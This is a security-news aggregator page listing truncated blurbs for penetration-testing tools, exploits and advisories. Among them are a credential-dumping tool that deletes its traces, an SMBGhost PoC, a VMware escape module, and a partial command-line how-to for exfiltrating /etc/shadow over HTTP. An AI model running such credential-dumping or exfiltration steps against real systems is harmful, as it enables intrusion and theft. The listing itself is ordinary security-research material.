HiveJack - This Tool Can Be Used During Internal Penetration Testing To Dump Windows Credentials From An Already-Compromised Host

This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM, SECURITY and SAM registry hives and once copied to the attacker machines provides an option to delete these files to clear the trace. Often, this i...

pentest-wiki

This repository is an information gathering library for penetration testers/researchers. It contains various tools and documentation for gathering information about a target organization, including IP analysis, whois analysis, and social media research. The library includes bookmarks for various...

Information_Collection_Handbook

Handbook of information collection for penetration testing...

Facebook Launches 'Discover,' A Secure Proxy to Browse the Internet for Free

More than six years after Facebook launched its ambitious Free Basics program to bring the Internet to the masses, the social network is back at it again with a new zero-rating initiative called Discover. The service, available as a mobile web and Android app, allows users to browse the Internet...

Brave Software: HTTP Request Smuggling

When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to "smuggle" a request to one device without the other device being awa...

Invoker - Penetration Testing Utility

Penetration testing utility. The goal is to use this tool when access to some Windows OS features through GUI is restricted. Some features require administrative privileges. Capabilities: invoke the Command Prompt and PowerShell, download a file, schedule a task, add a registry key, connect to a...

Trend Micro’s Top Ten MITRE Evaluation Considerations

The introduction of the MITRE ATT&CK evaluations is a welcomed addition to the third-party testing arena. The ATT&CK framework, and the evaluations in particular, have gone such a long way in helping advance the security industry as a whole, and the individual security products serving the market...

TestLink Input Validation Error Vulnerability

TestLink is a set of open source software for managing the software testing process and providing statistical analysis. An input validation error vulnerability exists in TestLink. Detailed vulnerability details are not available at this time...

信息收集

This repository is an information collection tool for penetration testing and vulnerability assessment. It is a collection of scripts and tools for gathering information about a target system or network. The repository is written in Python and includes various modules for different tasks such as...

S3Reverse - The Format Of Various S3 Buckets Is Convert In One Format

The format of various s3 buckets is convert in one format. for bugbounty and security testing. Install $ go get -u github.com/hahwul/s3reverse Usage Input options Basic Usage 8""""8 eeee 8"""8 8"""" 88 8 8"""" 8"""8 8""""8 8"""" 8 8 8 8 8 88 8 8 8 8 8 8 8eeeee 8 8eee8e 8eeee 88 e8 8eeee 8eee8e...

vmware_escape

This is an exploit module for VMware Workstation prior to version 12.5.5. The exploit targets a vulnerability in the way VMware handles certain types of memory access, allowing an attacker to execute arbitrary code on the host system. The exploit is designed to be used by an attacker who has gain...

Acronis: Denial of Service in anti_ransomware_service.exe via logs files

antiransomwareservice.exe keeps a log in a folder where any unprivileged user has write permissions. The logs are generated in a predictable pattern allowing the unprivileged user to create a hardlink from the, not yet created, log file to the antiransomwareservice itself. On reboot, this forces...

Getting ATT&CKed By A Cozy Bear And Being Really Happy About It: What MITRE Evaluations Are, and How To Read Them

Full disclosure: I am a security product testing nerd. I’ve been following the MITRE ATT&CK Framework for a while, and this week the results were released of the most recent evaluation using APT29 otherwise known as COZY BEAR. First, here’s a snapshot of the Trend eval results as I understand the...

metasploit-framework

This is a Metasploit Framework repository. The framework is a penetration testing tool that allows users to create and execute exploits against various targets. The repository contains a wide range of modules, including exploits, payloads, and auxiliary tools. The framework is written in Ruby and...

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft

CVE-2020-0796 Remote Code Execution POC c 2020 ZecOps, Inc...

Crescendo - A Swift Based, Real Time Event Viewer For macOS - It Utilizes Apple's Endpoint Security Framework

Crescendo is a swift based, real time event viewer for macOS. It utilizes Apple's Endpoint Security Framework. Getting Started Apple has introduced some new security mechanisms that we need to enable to get Crescendo running. 1.- Ensure that you have moved the app to your /Applications director o...

Oracle Application Testing Suite (Apr 2020 CPU)

The version of Oracle Application Testing Suite installed on the remote host is affected by a Server Side Request Forgery SSRF vulnerability in the Oracle FLEXCUBE Private Banking product of Oracle Financial Services Applications component: Core Apache Axis. The supported versions which are...

Design/Logic Flaw

An Insecure Direct Object Reference IDOR vulnerability in the Change Password feature of Subex ROC Partner Settlement 10.5 allows remote authenticated users to achieve account takeover via manipulation of POST parameters. NOTE: This vulnerability may only affect a testing version of the applicati...

metasploit-framework

This is an offensive tool for Metasploit Framework. It is a collection of Ruby code that provides a framework for developing and executing exploits, as well as a platform for testing and validating vulnerabilities. The repository contains a wide range of modules and tools for various tasks,...

Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only. Exfiltration How-To /etc/shadow - HTTP GET requests Server ./lollipopz-cli.py -m lollipopz.methods.http.paramcipher.GETServer -lp 80 -o output.log Client $ ./lollipopz-cli.py...